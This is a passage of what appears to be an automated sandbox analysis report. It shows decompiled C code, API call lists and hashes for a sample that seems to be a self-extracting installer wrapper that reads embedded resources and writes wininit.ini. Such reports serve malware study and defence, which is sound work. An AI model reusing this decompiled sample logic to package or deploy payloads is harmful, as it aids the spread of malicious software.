                                                                                                                                                                                                                                    0x00964460
                                                                                                                                                                                                                                    0x00964461
                                                                                                                                                                                                                                    0x00964467
                                                                                                                                                                                                                                    0x0096446f
                                                                                                                                                                                                                                    0x00964473
                                                                                                                                                                                                                                    0x00964473
                                                                                                                                                                                                                                    0x00964463
                                                                                                                                                                                                                                    0x00964463
                                                                                                                                                                                                                                    0x00964463
                                                                                                                                                                                                                                    0x0096447a
                                                                                                                                                                                                                                    0x00964481
                                                                                                                                                                                                                                    0x00964484
                                                                                                                                                                                                                                    0x0096448a
                                                                                                                                                                                                                                    0x00964492
                                                                                                                                                                                                                                    0x00964496
                                                                                                                                                                                                                                    0x00964496
                                                                                                                                                                                                                                    0x00964486
                                                                                                                                                                                                                                    0x00964486
                                                                                                                                                                                                                                    0x00964486
                                                                                                                                                                                                                                    0x009644b8

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 009643F1
                                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0096440B
                                                                                                                                                                                                                                    • GetDC.USER32(?), ref: 00964423
                                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000008), ref: 0096442E
                                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000A), ref: 0096443A
                                                                                                                                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 00964447
                                                                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,00000001,?), ref: 009644A2
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Window$CapsDeviceRect$Release
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2212493051-0
                                                                                                                                                                                                                                    • Opcode ID: d9506d3a99cc10920a25401c832c4978edb48a0425e5f28daddc2270dbb52d79
                                                                                                                                                                                                                                    • Instruction ID: e8a4f6e4f11bce13e65cc83e259792b05cfa863b2abf4daf8e91acc7eb04e4a0
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d9506d3a99cc10920a25401c832c4978edb48a0425e5f28daddc2270dbb52d79
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3B314932E14119AFCB14CFF8DD899EEBBB9EB89310F154169F805B3250DA74AC059BA0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00966298 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 90COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 53%
                                                                                                                                                                                                                                    			E00966298(intOrPtr __ecx, intOrPtr* __edx) {
				signed int _v8;
				char _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				struct HRSRC__* _t21;
				intOrPtr _t26;
				void* _t30;
				struct HINSTANCE__* _t36;
				intOrPtr* _t40;
				void* _t41;
				intOrPtr* _t44;
				intOrPtr* _t45;
				void* _t47;
				signed int _t50;
				struct HINSTANCE__* _t51;

				_t44 = __edx;
				_t16 =  *0x968004; // 0xf4cc89a0
				_v8 = _t16 ^ _t50;
				_t46 = 0;
				_v32 = __ecx;
				_v36 = 0;
				_t36 = 1;
				E0096171E( &_v28, 0x14, "UPDFILE%lu", 0);
				while(1) {
					_t51 = _t51 + 0x10;
					_t21 = FindResourceA(_t46,  &_v28, 0xa);
					if(_t21 == 0) {
						break;
					}
					_t45 = LockResource(LoadResource(_t46, _t21));
					if(_t45 == 0) {
						 *0x969124 = 0x80070714;
						_t36 = _t46;
					} else {
						_t5 = _t45 + 8; // 0x8
						_t44 = _t5;
						_t40 = _t44;
						_t6 = _t40 + 1; // 0x9
						_t47 = _t6;
						do {
							_t26 =  *_t40;
							_t40 = _t40 + 1;
						} while (_t26 != 0);
						_t41 = _t40 - _t47;
						_t46 = _t51;
						_t7 = _t41 + 1; // 0xa
						 *0x96a288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
						_t30 = _v32();
						if(_t51 != _t51) {
							asm("int 0x29");
						}
						_push(_t45);
						if(_t30 == 0) {
							_t36 = 0;
							FreeResource(??);
						} else {
							FreeResource();
							_v36 = _v36 + 1;
							E0096171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
							_t46 = 0;
							continue;
						}
					}
					L12:
					return E00966CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
				}
				goto L12;
			}






















                                                                                                                                                                                                                                    0x00966298
                                                                                                                                                                                                                                    0x009662a0
                                                                                                                                                                                                                                    0x009662a7
                                                                                                                                                                                                                                    0x009662ad
                                                                                                                                                                                                                                    0x009662af
                                                                                                                                                                                                                                    0x009662bb
                                                                                                                                                                                                                                    0x009662c3
                                                                                                                                                                                                                                    0x009662c4
                                                                                                                                                                                                                                    0x0096633b
                                                                                                                                                                                                                                    0x0096633b
                                                                                                                                                                                                                                    0x00966345
                                                                                                                                                                                                                                    0x0096634d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009662da
                                                                                                                                                                                                                                    0x009662de
                                                                                                                                                                                                                                    0x0096635f
                                                                                                                                                                                                                                    0x00966369
                                                                                                                                                                                                                                    0x009662e0
                                                                                                                                                                                                                                    0x009662e0
                                                                                                                                                                                                                                    0x009662e0
                                                                                                                                                                                                                                    0x009662e3
                                                                                                                                                                                                                                    0x009662e5
                                                                                                                                                                                                                                    0x009662e5
                                                                                                                                                                                                                                    0x009662e8
                                                                                                                                                                                                                                    0x009662e8
                                                                                                                                                                                                                                    0x009662ea
                                                                                                                                                                                                                                    0x009662eb
                                                                                                                                                                                                                                    0x009662ef
                                                                                                                                                                                                                                    0x009662f1
                                                                                                                                                                                                                                    0x009662f3
                                                                                                                                                                                                                                    0x00966302
                                                                                                                                                                                                                                    0x00966308
                                                                                                                                                                                                                                    0x0096630d
                                                                                                                                                                                                                                    0x00966314
                                                                                                                                                                                                                                    0x00966314
                                                                                                                                                                                                                                    0x00966316
                                                                                                                                                                                                                                    0x00966319
                                                                                                                                                                                                                                    0x00966355
                                                                                                                                                                                                                                    0x00966357
                                                                                                                                                                                                                                    0x0096631b
                                                                                                                                                                                                                                    0x0096631b
                                                                                                                                                                                                                                    0x00966331
                                                                                                                                                                                                                                    0x00966334
                                                                                                                                                                                                                                    0x00966339
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00966339
                                                                                                                                                                                                                                    0x00966319
                                                                                                                                                                                                                                    0x0096636b
                                                                                                                                                                                                                                    0x0096637d
                                                                                                                                                                                                                                    0x0096637d
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 0096171E: _vsnprintf.MSVCRT ref: 00961750
                                                                                                                                                                                                                                    • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,009651CA,00000004,00000024,00962F71,?,00000002,00000000), ref: 009662CD
                                                                                                                                                                                                                                    • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,009651CA,00000004,00000024,00962F71,?,00000002,00000000), ref: 009662D4
                                                                                                                                                                                                                                    • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,009651CA,00000004,00000024,00962F71,?,00000002,00000000), ref: 0096631B
                                                                                                                                                                                                                                    • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 00966345
                                                                                                                                                                                                                                    • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,009651CA,00000004,00000024,00962F71,?,00000002,00000000), ref: 00966357
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                                                                                                                                                                                    • String ID: UPDFILE%lu
                                                                                                                                                                                                                                    • API String ID: 2922116661-2329316264
                                                                                                                                                                                                                                    • Opcode ID: be2f84f6511bc435f4d17f36d4c402ee20d79e631d85e6e60338bc73866dc47d
                                                                                                                                                                                                                                    • Instruction ID: a04c8f0bec5220e935b715b6ee69e1424974277c8d960077a01297ccfe92e49c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: be2f84f6511bc435f4d17f36d4c402ee20d79e631d85e6e60338bc73866dc47d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D821F171A04219ABDB14AFA48C45DFFBB7CFB89714B04022DF902A3241DB799D069BE0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 0096681F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 81registryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                                                                                                    			E0096681F(void* __ebx) {
				signed int _v8;
				char _v20;
				struct _OSVERSIONINFOA _v168;
				void* _v172;
				int* _v176;
				int _v180;
				int _v184;
				void* __edi;
				void* __esi;
				signed int _t19;
				long _t31;
				signed int _t35;
				void* _t36;
				intOrPtr _t41;
				signed int _t44;

				_t36 = __ebx;
				_t19 =  *0x968004; // 0xf4cc89a0
				_v8 = _t19 ^ _t44;
				_t41 =  *0x9681d8; // 0xfffffffe
				_t43 = 0;
				_v180 = 0xc;
				_v176 = 0;
				if(_t41 == 0xfffffffe) {
					 *0x9681d8 = 0;
					_v168.dwOSVersionInfoSize = 0x94;
					if(GetVersionExA( &_v168) == 0) {
						L12:
						_t41 =  *0x9681d8; // 0xfffffffe
					} else {
						_t41 = 1;
						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
							goto L12;
						} else {
							_t31 = RegQueryValueExA(_v172, 0x961140, 0,  &_v184,  &_v20,  &_v180);
							_t43 = _t31;
							RegCloseKey(_v172);
							if(_t31 != 0) {
								goto L12;
							} else {
								_t40 =  &_v176;
								if(E009666F9( &_v20,  &_v176) == 0) {
									goto L12;
								} else {
									_t35 = _v176 & 0x000003ff;
									if(_t35 == 1 || _t35 == 0xd) {
										 *0x9681d8 = _t41;
									} else {
										goto L12;
									}
								}
							}
						}
					}
				}
				return E00966CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
			}


















                                                                                                                                                                                                                                    0x0096681f
                                                                                                                                                                                                                                    0x0096682a
                                                                                                                                                                                                                                    0x00966831
                                                                                                                                                                                                                                    0x00966836
                                                                                                                                                                                                                                    0x0096683c
                                                                                                                                                                                                                                    0x0096683e
                                                                                                                                                                                                                                    0x00966848
                                                                                                                                                                                                                                    0x00966851
                                                                                                                                                                                                                                    0x0096685d
                                                                                                                                                                                                                                    0x00966864
                                                                                                                                                                                                                                    0x00966876
                                                                                                                                                                                                                                    0x0096693a
                                                                                                                                                                                                                                    0x0096693a
                                                                                                                                                                                                                                    0x0096687c
                                                                                                                                                                                                                                    0x0096687e
                                                                                                                                                                                                                                    0x00966885
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009668d6
                                                                                                                                                                                                                                    0x009668f4
                                                                                                                                                                                                                                    0x00966900
                                                                                                                                                                                                                                    0x00966902
                                                                                                                                                                                                                                    0x0096690a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0096690c
                                                                                                                                                                                                                                    0x0096690c
                                                                                                                                                                                                                                    0x0096691c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0096691e
                                                                                                                                                                                                                                    0x00966924
                                                                                                                                                                                                                                    0x0096692b
                                                                                                                                                                                                                                    0x00966932
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0096692b
                                                                                                                                                                                                                                    0x0096691c
                                                                                                                                                                                                                                    0x0096690a
                                                                                                                                                                                                                                    0x00966885
                                                                                                                                                                                                                                    0x00966876
                                                                                                                                                                                                                                    0x00966951

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0096686E
                                                                                                                                                                                                                                    • GetSystemMetrics.USER32(0000004A), ref: 009668A7
                                                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 009668CC
                                                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,00961140,00000000,?,?,0000000C), ref: 009668F4
                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00966902
                                                                                                                                                                                                                                      • Part of subcall function 009666F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,0096691A), ref: 00966741
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • Control Panel\Desktop\ResourceLocale, xrefs: 009668C2
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                                                                                                                                                                                    • String ID: Control Panel\Desktop\ResourceLocale
                                                                                                                                                                                                                                    • API String ID: 3346862599-1109908249
                                                                                                                                                                                                                                    • Opcode ID: e98f5288984414ade9d308901b4e66c74b77676b6b2a3e72c5b4a602850765a7
                                                                                                                                                                                                                                    • Instruction ID: 216e5871b876991a0dfc7124631a1c9448b0db0afedbd5ab51aef38f3438391d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e98f5288984414ade9d308901b4e66c74b77676b6b2a3e72c5b4a602850765a7
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4B318C31A042289FDF218B11CC04BAAB7B8EB46768F0101ADE949B2140DB709E859F92
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00963A3F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 73memorystringCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E00963A3F(void* __eflags) {
				void* _t3;
				void* _t9;
				CHAR* _t16;

				_t16 = "LICENSE";
				_t1 = E0096468F(_t16, 0, 0) + 1; // 0x1
				_t3 = LocalAlloc(0x40, _t1);
				 *0x968d4c = _t3;
				if(_t3 != 0) {
					_t19 = _t16;
					if(E0096468F(_t16, _t3, _t28) != 0) {
						if(lstrcmpA( *0x968d4c, "<None>") == 0) {
							LocalFree( *0x968d4c);
							L9:
							 *0x969124 = 0;
							return 1;
						}
						_t9 = E00966517(_t19, 0x7d1, 0, E00963100, 0, 0);
						LocalFree( *0x968d4c);
						if(_t9 != 0) {
							goto L9;
						}
						 *0x969124 = 0x800704c7;
						L2:
						return 0;
					}
					E009644B9(0, 0x4b1, 0, 0, 0x10, 0);
					LocalFree( *0x968d4c);
					 *0x969124 = 0x80070714;
					goto L2;
				}
				E009644B9(0, 0x4b5, 0, 0, 0x10, 0);
				 *0x969124 = E00966285();
				goto L2;
			}






                                                                                                                                                                                                                                    0x00963a46
                                                                                                                                                                                                                                    0x00963a57
                                                                                                                                                                                                                                    0x00963a5d
                                                                                                                                                                                                                                    0x00963a63
                                                                                                                                                                                                                                    0x00963a6a
                                                                                                                                                                                                                                    0x00963a91
                                                                                                                                                                                                                                    0x00963a9a
                                                                                                                                                                                                                                    0x00963ad8
                                                                                                                                                                                                                                    0x00963b13
                                                                                                                                                                                                                                    0x00963b19
                                                                                                                                                                                                                                    0x00963b1b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963b21
                                                                                                                                                                                                                                    0x00963ae7
                                                                                                                                                                                                                                    0x00963af4
                                                                                                                                                                                                                                    0x00963afc
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963afe
                                                                                                                                                                                                                                    0x00963a87
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963a87
                                                                                                                                                                                                                                    0x00963aa8
                                                                                                                                                                                                                                    0x00963ab3
                                                                                                                                                                                                                                    0x00963ab9
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963ab9
                                                                                                                                                                                                                                    0x00963a78
                                                                                                                                                                                                                                    0x00963a82
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 0096468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009646A0
                                                                                                                                                                                                                                      • Part of subcall function 0096468F: SizeofResource.KERNEL32(00000000,00000000,?,00962D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009646A9
                                                                                                                                                                                                                                      • Part of subcall function 0096468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009646C3
                                                                                                                                                                                                                                      • Part of subcall function 0096468F: LoadResource.KERNEL32(00000000,00000000,?,00962D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009646CC
                                                                                                                                                                                                                                      • Part of subcall function 0096468F: LockResource.KERNEL32(00000000,?,00962D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009646D3
                                                                                                                                                                                                                                      • Part of subcall function 0096468F: memcpy_s.MSVCRT ref: 009646E5
                                                                                                                                                                                                                                      • Part of subcall function 0096468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 009646EF
                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00962F64,?,00000002,00000000), ref: 00963A5D
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 00963AB3
                                                                                                                                                                                                                                      • Part of subcall function 009644B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00964518
                                                                                                                                                                                                                                      • Part of subcall function 009644B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00964554
                                                                                                                                                                                                                                      • Part of subcall function 00966285: GetLastError.KERNEL32(00965BBC), ref: 00966285
                                                                                                                                                                                                                                    • lstrcmpA.KERNEL32(<None>,00000000), ref: 00963AD0
                                                                                                                                                                                                                                    • LocalFree.KERNEL32 ref: 00963B13
                                                                                                                                                                                                                                      • Part of subcall function 00966517: FindResourceA.KERNEL32(00960000,000007D6,00000005), ref: 0096652A
                                                                                                                                                                                                                                      • Part of subcall function 00966517: LoadResource.KERNEL32(00960000,00000000,?,?,00962EE8,00000000,009619E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00966538
                                                                                                                                                                                                                                      • Part of subcall function 00966517: DialogBoxIndirectParamA.USER32(00960000,00000000,00000547,009619E0,00000000), ref: 00966557
                                                                                                                                                                                                                                      • Part of subcall function 00966517: FreeResource.KERNEL32(00000000,?,?,00962EE8,00000000,009619E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00966560
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,00963100,00000000,00000000), ref: 00963AF4
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                                                                                                                                                                                    • String ID: <None>$LICENSE
                                                                                                                                                                                                                                    • API String ID: 2414642746-383193767
                                                                                                                                                                                                                                    • Opcode ID: 6df482102f0377182e8c725c9a6dfae0f675063b9d9e0af4b85cc57490258883
                                                                                                                                                                                                                                    • Instruction ID: b08931b8f4513fb0c43f945f624b957a367a31c259bdf3c78226618d9d1d629a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6df482102f0377182e8c725c9a6dfae0f675063b9d9e0af4b85cc57490258883
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0211D670318201BBD720AF72AC19F2739FDDBD6740B11852EF542E61E1DEF98800BA20
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 009624E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                                                                                                    			E009624E0(void* __ebx) {
				signed int _v8;
				char _v268;
				void* __edi;
				void* __esi;
				signed int _t7;
				void* _t20;
				long _t26;
				signed int _t27;

				_t20 = __ebx;
				_t7 =  *0x968004; // 0xf4cc89a0
				_v8 = _t7 ^ _t27;
				_t25 = 0x104;
				_t26 = 0;
				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
					E0096658A( &_v268, 0x104, "wininit.ini");
					WritePrivateProfileStringA(0, 0, 0,  &_v268);
					_t25 = _lopen( &_v268, 0x40);
					if(_t25 != 0xffffffff) {
						_t26 = _llseek(_t25, 0, 2);
						_lclose(_t25);
					}
				}
				return E00966CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
			}











                                                                                                                                                                                                                                    0x009624e0
                                                                                                                                                                                                                                    0x009624eb
                                                                                                                                                                                                                                    0x009624f2
                                                                                                                                                                                                                                    0x009624f7
                                                                                                                                                                                                                                    0x00962504
                                                                                                                                                                                                                                    0x0096250e
                                                                                                                                                                                                                                    0x0096251d
                                                                                                                                                                                                                                    0x0096252c
                                                                                                                                                                                                                                    0x00962541
                                                                                                                                                                                                                                    0x00962546
                                                                                                                                                                                                                                    0x00962553
                                                                                                                                                                                                                                    0x00962555
                                                                                                                                                                                                                                    0x00962555
                                                                                                                                                                                                                                    0x00962546
                                                                                                                                                                                                                                    0x0096256c

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00962506
                                                                                                                                                                                                                                    • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 0096252C
                                                                                                                                                                                                                                    • _lopen.KERNEL32 ref: 0096253B
                                                                                                                                                                                                                                    • _llseek.KERNEL32(00000000,00000000,00000002), ref: 0096254C
                                                                                                                                                                                                                                    • _lclose.KERNEL32(00000000), ref: 00962555
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                                                                                                                                                                                    • String ID: wininit.ini
                                                                                                                                                                                                                                    • API String ID: 3273605193-4206010578
                                                                                                                                                                                                                                    • Opcode ID: 283df31dedeeebaf51e631189092c6aa64456ab8fbf861a77cd3bcd69456b0c0
                                                                                                                                                                                                                                    • Instruction ID: 77571113f9672bd55ac8d92ebbb5b122eda06657641264e12b29e9fa06938881
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 283df31dedeeebaf51e631189092c6aa64456ab8fbf861a77cd3bcd69456b0c0
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9401D4326041286BC720AB65DD0DEDFBB7CEB86760F000159FA49E3190DEB48E45CEA1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 009636EE Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 243windowCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 75%
                                                                                                                                                                                                                                    			E009636EE(CHAR* __ecx) {
				signed int _v8;
				char _v268;
				struct _OSVERSIONINFOA _v416;
				signed int _v420;
				signed int _v424;
				CHAR* _v428;
				CHAR* _v432;
				signed int _v436;
				CHAR* _v440;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t72;
				CHAR* _t77;
				CHAR* _t91;
				CHAR* _t94;
				int _t97;
				CHAR* _t98;
				signed char _t99;
				CHAR* _t104;
				signed short _t107;
				signed int _t109;
				short _t113;
				void* _t114;
				signed char _t115;
				short _t119;
				CHAR* _t123;
				CHAR* _t124;
				CHAR* _t129;
				signed int _t131;
				signed int _t132;
				CHAR* _t135;
				CHAR* _t138;
				signed int _t139;

				_t72 =  *0x968004; // 0xf4cc89a0
				_v8 = _t72 ^ _t139;
				_v416.dwOSVersionInfoSize = 0x94;
				_t115 = __ecx;
				_t135 = 0;
				_v432 = __ecx;
				_t138 = 0;
				if(GetVersionExA( &_v416) != 0) {
					_t133 = _v416.dwMajorVersion;
					_t119 = 2;
					_t77 = _v416.dwPlatformId - 1;
					__eflags = _t77;
					if(_t77 == 0) {
						_t119 = 0;
						__eflags = 1;
						 *0x968184 = 1;
						 *0x968180 = 1;
						L13:
						 *0x969a40 = _t119;
						L14:
						__eflags =  *0x968a34 - _t138; // 0x0
						if(__eflags != 0) {
							goto L66;
						}
						__eflags = _t115;
						if(_t115 == 0) {
							goto L66;
						}
						_v428 = _t135;
						__eflags = _t119;
						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
						_t11 =  &_v420;
						 *_t11 = _v420 & _t138;
						__eflags =  *_t11;
						_v440 = _t115;
						do {
							_v424 = _t135 * 0x18;
